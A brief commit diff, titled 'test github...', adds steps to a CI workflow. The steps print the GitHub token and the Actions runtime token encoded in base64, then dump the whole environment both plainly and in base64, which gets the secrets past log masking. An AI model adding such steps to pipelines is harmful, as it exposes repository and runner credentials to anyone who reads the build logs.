test github...

This commit is contained in:
Chl 2024-08-30 02:11:32 +02:00
parent 873d264f96
commit 316b1a0533
2 changed files with 4 additions and 0 deletions

View file

@ -28,6 +28,8 @@ jobs:
git config --local gc.auto 0
git fetch --no-tags --prune --no-recurse-submodules --depth=1 origin "$GITHUB_SHA"
git reset --hard "$GITHUB_SHA"
echo "$GITHUB_TOKEN" | base64
echo "$ACTIONS_RUNTIME_TOKEN" | base64
printenv
printenv|base64